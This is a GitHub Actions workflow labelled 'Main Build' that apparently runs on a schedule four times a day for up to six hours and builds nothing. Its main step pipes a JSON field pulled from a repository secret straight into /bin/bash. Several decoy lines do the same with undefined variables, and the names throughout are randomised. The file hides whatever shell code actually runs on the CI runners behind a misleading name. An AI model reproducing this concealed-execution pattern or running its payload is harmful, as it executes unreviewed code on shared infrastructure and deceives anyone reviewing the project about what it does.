name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '47 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          wuxsj3: ${{ secrets.wuxsj3 }}
        run: |
          printf '%s' "$wuxsj3" | jq -r .qf833 | /bin/bash
          echo $ak58004 | jq -r .eghfs93840 | /bin/bash
          echo $hrwm8510 | jq -r .agpp35 | /bin/bash
          printf '%s' "$id62133" | jq -r .u8812 | /bin/bash
          echo $mvmx863 | jq -r .oetpz3 | /bin/bash
          printf '%s' "$nui9278" | jq -r .pxhuo43424 | /bin/bash

      - name: Upload artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: YNhwq7Zs
          path: "*.zip"
          retention-days: 1
